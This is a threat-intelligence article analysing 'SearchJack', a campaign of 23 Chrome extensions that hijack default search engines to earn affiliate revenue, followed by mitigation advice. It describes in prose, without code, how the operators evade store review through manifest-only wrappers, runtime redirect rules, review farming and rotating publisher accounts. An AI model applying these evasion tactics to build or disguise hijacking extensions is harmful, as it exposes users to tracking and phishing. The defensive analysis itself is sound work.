The Anatomy of SearchJack: Exploiting Chrome Settings for Large-Scale Affiliate Revenue
A sophisticated, coordinated campaign involving 23 seemingly benign Chrome extensions—tracked under the moniker “SearchJack”—has successfully compromised the default search configurations of approximately 758,000 users. Rather than delivering the promised utility, these extensions act as man-in-the-middle proxies, intercepting user queries and routing them through proprietary monetization middleware before delivering results from hosted search partners.
On the surface, these extensions masquerade as helpful productivity tools, offering features such as satellite imagery, news aggregators, or advanced map interfaces. However, their underlying architecture is designed for affiliate search monetization. By leveraging hosted search providers like Yahoo and various multi-network affiliate brokers, the operators extract revenue from every search performed by the hijacked browser.
The technical execution of SearchJack is both efficient and stealthy. The extensions exploit the chrome_settings_overrides manifest key, a legitimate permission that allows an extension to programmatically set itself as the browser’s default search engine. To bypass the scrutiny of automated store reviews, many of these extensions function as “manifest-only” wrappers—containing no heavy background scripts or invasive permissions—while others implement superficial functionality to provide a veneer of legitimacy.
Through deep packet inspection and URL analysis, researchers have identified at least eight distinct hspart brokers embedded within the final Yahoo redirect strings. Notable broker identifiers include trp, infospace (System1), flowsurf, adk, becovi, imageadvan, mnet, fc, and dcola.
This campaign, analyzed on June 9, 2026, by the MalExt Sentry automated scanner, highlights a highly scalable, broker-driven model that evades traditional platform policing and introduces significant privacy and phishing vulnerabilities.
Campaign Intelligence Summary
| Campaign Name | SearchJack |
| Extensions Identified | 23 |
| Unique Publishers | 22 |
| Total Affected Users | ~758,000 |
| Monetization Brokers | 8 identified via hspart |
| Primary Revenue Vector | Hosted Search Affiliate (Yahoo/Multi-network) |
| Analysis Date | June 09, 2026 |
One of the most resilient aspects of this operation is the decoupling of the publisher from the revenue stream. Because the broker relationships exist independently of the extensions, attackers can simply rotate “disposable” publisher accounts to maintain continuity of income even after specific extensions are removed from the store.
Technical Analysis of Adware Behavior
While the extensions vary in scale—ranging from niche tools to high-traffic installs like PerfecTab Search and Quick Search Tool (~100K installs each)—they share a consistent infrastructure pattern. Several technical anomalies indicate intentional deception:
- Deceptive Privacy Claims: Nautilus Search explicitly states in its store listing that it does not track user searches, yet its privacy policy contradicts this by disclosing the collection of IP addresses and query logs.
- Runtime Injection: Search Toggler utilizes the
chrome.declarativeNetRequest.updateDynamicRules()API. This allows the extension to inject redirect rules at runtime, keeping the actual malicious routing invisible to static code analysis during the initial review process. - Review Manipulation: Extensions like Fusebase Search exhibit implausible install-to-review ratios, suggesting the use of automated review farming or the repurposing of aged, high-reputation accounts.
This evolution from simple adware to a systemic security threat cannot be overstated. By controlling the middleware, operators gain the ability to switch payloads centrally. A search engine that appears benign today can, via a server-side update, transition into a delivery mechanism for phishing pages, credential harvesters, or drive-by download sites—all without requiring a single change to the extension’s client-side code.
Attribution and Mitigation Strategies
The technical artifacts found in the SearchJack corpus—specifically the use of yhs-* parameters and backend templates like /admin/public/link—provide a clear roadmap for incident response. To effectively combat this, a multi-layered approach is required:
For Platform Operators: Takedowns must move beyond individual extension IDs. Enforcement must target the underlying affiliate accounts and the hosted-search infrastructure that facilitates the revenue flow. Enhanced runtime behavior scanning and stricter publisher verification are essential to close these loopholes.
For Enterprise Security Teams: Detection logic should focus on monitoring for unauthorized changes to chrome_settings_overrides. Security tools should be configured to inspect outbound redirect chains for suspicious hspart parameters and flag domains associated with known intermediary search endpoints.
For End Users: If you notice your search engine has changed unexpectedly, audit your installed extensions immediately. Remove any suspicious or unneeded tools and reset your browser’s default search settings to a trusted provider.
Until broker-level controls are tightened, SearchJack-style campaigns will continue to serve as a profitable and resilient vector for large-scale privacy invasion and social engineering attacks.